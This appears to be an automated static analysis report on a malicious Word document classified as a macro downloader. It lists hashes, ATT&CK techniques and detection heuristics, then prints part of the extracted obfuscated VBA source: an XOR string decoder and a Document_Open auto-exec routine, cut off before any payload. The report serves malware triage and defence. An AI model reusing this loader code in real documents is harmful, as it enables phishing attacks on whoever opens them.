Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 cd2f263c243e941b…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 221.5 KB
Created: 2015-11-21 18:59:00
Authoring application: Microsoft Office Word
First seen: 2019-04-18
MD5: aa733b8c49cef104810282029b572fde
SHA-1: 33405c4939d5a7786b33e31b2f7e803cc240e061
SHA-256: cd2f263c243e941bf91b291619a898660b222b29618dabbdcd82905db32b3a58
Risk Score: 270

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File
  • T1566.001 Phishing: Spearphishing Attachment

The file contains a heavily obfuscated VBA macro that is triggered by the Document_Open event. The macro uses CreateObject to execute code, a common technique for downloading and running a secondary payload. The ClamAV detection name 'Doc.Downloader.Generic-6707072-0' further supports the downloader classification.

Heuristics (8)

  • ClamAV: Doc.Downloader.Generic-6707072-0 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Downloader.Generic-6707072-0
  • VBA macros detected (medium, 5 related findings, OLE_VBA_MACROS)
    Document contains VBA macro code
  • Obfuscated auto-exec VBA loader (critical, OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER)
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • Document_Open macro (high, OLE_VBA_DOCOPEN)
    Document_Open macro
  • CreateObject call (high, OLE_VBA_CREATEOBJ)
    CreateObject call
  • VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Environ() call (env variable access) (low, OLE_VBA_ENVIRON)
    Environ() call (env variable access)
  • Embedded URL (info, EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://ns.adobe.com/xap/1.0/ (in document text, OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns# (in document text, OLE body)
    • http://ns.adobe.com/xap/1.0/mm/ (in document text, OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent# (in document text, OLE body)
    • http://purl.org/dc/elements/1.1/ (in document text, OLE body)
    • http://ns.adobe.com/photoshop/1.0/ (in document text, OLE body)
    • http://www.iec.ch (in document text, OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 16338 bytes
SHA-256: 2eb5cbf17641183641f05caa525dc8ba4d0e8c47f932564cd28e9e480466f199

Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
#If VBA7 Then
Private Declare PtrSafe Function FiOhvKV5yT Lib "Lkt6o8pmvGrNO" Alias "PWYEuuBiV" (ByVal InHWN3QclIE As String, JHaob5RaBb0pUW As Long) As Long
#Else
Private Declare Function FiOhvKV5yT lib "Lkt6o8pmvGrNO" Alias "PWYEuuBiV"(byval InHWN3QclIE as String, JHaob5RaBb0pUW as Long ) as Long
#End If
Private GpkKWN3 As String
Function N850BCurHo(ByVal LemiyA6QZnuCYC As String, XUn6QwHKyAv As String) As String
PevSFR3rv0e2RZK = 39
If PevSFR3rv0e2RZK + MJDM0hu5rU7Tdb > 1 Then
MJDM0hu5rU7Tdb = 1 + 18
'19 Clra 16 25
End If
MJDM0hu5rU7Tdb = 69
'82 96 55 EHgu
On Error Resume Next
SQoiCuInevSFR3rv0 = 82
If SQoiCuInevSFR3rv0 + NsNJTqkk3w > 1 Then
NsNJTqkk3w = 72 + 29
'32 GvriOI9 94 34
End If
NsNJTqkk3w = 44
'59 39 1 HSHSe4Iv
Dim GJE0Xk() As Byte, Uu3ahNk9NV(0 To 285) As Integer, CtAp9AJ0lBLNg() As Byte, NyTk5LjHttv, Hboyl0jeJwPSe, L7j2iquXfw8f, HlgcUkRQ3VZtHDYq, L8aV9L4vUWh As Boolean
It9Acrpc7M = 30
If It9Acrpc7M + DrjiAY5ezWAm > 1 Then
DrjiAY5ezWAm = 53 + 31
'26 RCZpY 14 49
End If
DrjiAY5ezWAm = 44
'87 56 76 HPqsPooeMN9zRPs3
GJE0Xk = StrConv(LemiyA6QZnuCYC, (64 + 1 + 64 - 1))
VwkYpXxUG = 28
If VwkYpXxUG + L7MtzHaiOhvKV > 1 Then
L7MtzHaiOhvKV = 60 + 12
'10 HbZCtRcd4hpmvGrNO 41 22
End If
L7MtzHaiOhvKV = 27
'11 59 15 IlWZ1yGPfpiG
CtAp9AJ0lBLNg() = StrConv(XUn6QwHKyAv, (64 + 5 + 64 - 5))
C1aZX3huwbllRm = 94
If C1aZX3huwbllRm + Orcx0psolAwdff4 > 1 Then
Orcx0psolAwdff4 = 49 + 58
'84 SgJEI38zx 78 45
End If
Orcx0psolAwdff4 = 71
'20 20 72 TmV0hQRiff
Hboyl0jeJwPSe = UBound(CtAp9AJ0lBLNg)
FXBI0cjkxDlMD = 32
If FXBI0cjkxDlMD + CJqQ7WXZNbh3E > 1 Then
CJqQ7WXZNbh3E = 10 + 5
'92 Fh3vFSWMRoJaMPe 28 22
End If
CJqQ7WXZNbh3E = 66
'8 55 66 TytC1onRx
For NyTk5LjHttv = 0 To (127.5 + 7 + 127.5 - 7)
Uu3ahNk9NV(NyTk5LjHttv) = NyTk5LjHttv
Next NyTk5LjHttv
For NyTk5LjHttv = (128 + 2 + 128 - 2) To (142.5 + 2 + 142.5 - 2)
Uu3ahNk9NV(NyTk5LjHttv) = NyTk5LjHttv Xor (128 + 7 + 128 - 7)
Next NyTk5LjHttv
For NyTk5LjHttv = 1 To (3 + 8 + 3 - 8)
Uu3ahNk9NV(NyTk5LjHttv + (124.5 + 1 + 124.5 - 1)) = CtAp9AJ0lBLNg(Hboyl0jeJwPSe - NyTk5LjHttv)
Uu3ahNk9NV(NyTk5LjHttv - 1) = CtAp9AJ0lBLNg(NyTk5LjHttv - 1) Xor ((127.5 + 6 + 127.5 - 6) - CtAp9AJ0lBLNg(Hboyl0jeJwPSe - NyTk5LjHttv))
Next NyTk5LjHttv
L8aV9L4vUWh = False
L7j2iquXfw8f = 0
HlgcUkRQ3VZtHDYq = 0
For NyTk5LjHttv = 0 To UBound(GJE0Xk)
If L7j2iquXfw8f > Hboyl0jeJwPSe Then L7j2iquXfw8f = 0
If HlgcUkRQ3VZtHDYq > (142.5 + 6 + 142.5 - 6) And L8aV9L4vUWh = False Then HlgcUkRQ3VZtHDYq = 0: L8aV9L4vUWh = Not (L8aV9L4vUWh)
If HlgcUkRQ3VZtHDYq > (142.5 + 1 + 142.5 - 1) And L8aV9L4vUWh = True Then HlgcUkRQ3VZtHDYq = (2.5 + 4 + 2.5 - 4): L8aV9L4vUWh = Not (L8aV9L4vUWh)
GJE0Xk(NyTk5LjHttv) = (GJE0Xk(NyTk5LjHttv) Xor (Uu3ahNk9NV(HlgcUkRQ3VZtHDYq) Xor CtAp9AJ0lBLNg(L7j2iquXfw8f)))
L7j2iquXfw8f = L7j2iquXfw8f + 1
HlgcUkRQ3VZtHDYq = HlgcUkRQ3VZtHDYq + 1
Next NyTk5LjHttv
WuyDMqJlc9EExGn = 95
If WuyDMqJlc9EExGn + MD6vOtbeXg08Apf > 1 Then
MD6vOtbeXg08Apf = 46 + 67
'56 FRKdQgv8nI4s 91 59
End If
MD6vOtbeXg08Apf = 3
'71 91 4 Dr9gJTFhJbaTyvr
N850BCurHo = StrConv(GJE0Xk(), (32 + 6 + 32 - 6))
PQtmFj4 = 59
If PQtmFj4 + Jy5AeFk8EPh5 > 1 Then
Jy5AeFk8EPh5 = 81 + 87
'16 Y28Ireu 57 60
End If
Jy5AeFk8EPh5 = 78
'97 87 44 QSITYPlOzd9wZo5wK
End Function
Sub Document_Open()
Y8zxt6Msdpa = 73
If Y8zxt6Msdpa + IffQgv8nI4s > 1 Then
IffQgv8nI4s = 85 + 23
'38 NlQBbSx8CvjG5n 18 78
End If
IffQgv8nI4s = 69
'70 67 77 SK2Okf9
On Error Resume Next
PKaAwdff4 = 59
If PKaAwdff4 + UGTAOx > 1 Then
UGTAOx = 3 + 71
'91 BpX8trlI24f 4 95
End If
UGTAOx = 18
'51 79 94 Seuq3p2oT0
Dim DrqjA As Long, YsFjPuyG As Long, YhNAv As Long, V6cC3scUY4zddH99R As Long
Pn2j04QQZ = 39
If Pn2j04QQZ + PhB4lG17FG95 > 1 Then
PhB4lG17FG95 = 15 + 88
'41 WCYB5Gg 83 81
End If
PhB4lG17FG95 = 35
'33 
... (truncated)